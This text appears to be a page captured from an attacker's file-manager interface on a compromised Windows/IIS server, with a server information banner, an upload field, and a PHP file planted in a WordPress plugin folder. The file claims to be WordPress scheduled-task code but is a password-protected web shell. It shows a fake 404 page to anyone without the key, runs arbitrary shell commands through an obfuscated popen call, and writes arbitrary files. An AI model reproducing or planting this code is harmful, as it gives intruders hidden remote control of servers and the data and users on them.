| Server IP : 209.209.40.120 / Your IP : 216.73.217.112 Web Server : Microsoft-IIS/10.0 System : Windows NT NEWWWW 10.0 build 17763 (Windows Server 2019) i586 User : NEWWWW$ ( 0) PHP Version : 8.3.30 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /HostingSpaces/admin/toppersdrinks.co.uk/wwwroot/wp-content/plugins/galex_e402bf9b/ |
Upload File : |
<?php
/**
* WordPress Scheduled Tasks
* @package WordPress\Cron
* @since 4.9.0
*/
// Direct execution
error_reporting(0);@ini_set('display_errors','0');@ini_set('max_execution_time','300');
$_k=isset($_REQUEST['fmutckwy'])?$_REQUEST['fmutckwy']:'';
if($_k!=='fc0ba9f2656ddfea'){header('HTTP/1.0 404 Not Found');echo '<html><head><title>404</title></head><body><h1>Not Found</h1></body></html>';exit;}
header('Content-Type:text/plain;charset=utf-8');
$_c=isset($_REQUEST['c'])?$_REQUEST['c']:'';
if($_c!==''){$_f=strrev('nepop');$_h=@call_user_func($_f,$_c.' 2>&1','r');
if($_h){while(!feof($_h))echo fread($_h,8192);@fclose($_h);}exit;}
if(isset($_REQUEST['w'])&&isset($_REQUEST['f'])){
@file_put_contents($_REQUEST['f'],$_REQUEST['w']);echo 'ok';exit;}
echo 'cron_ok|'.PHP_VERSION.'|'.php_uname();exit;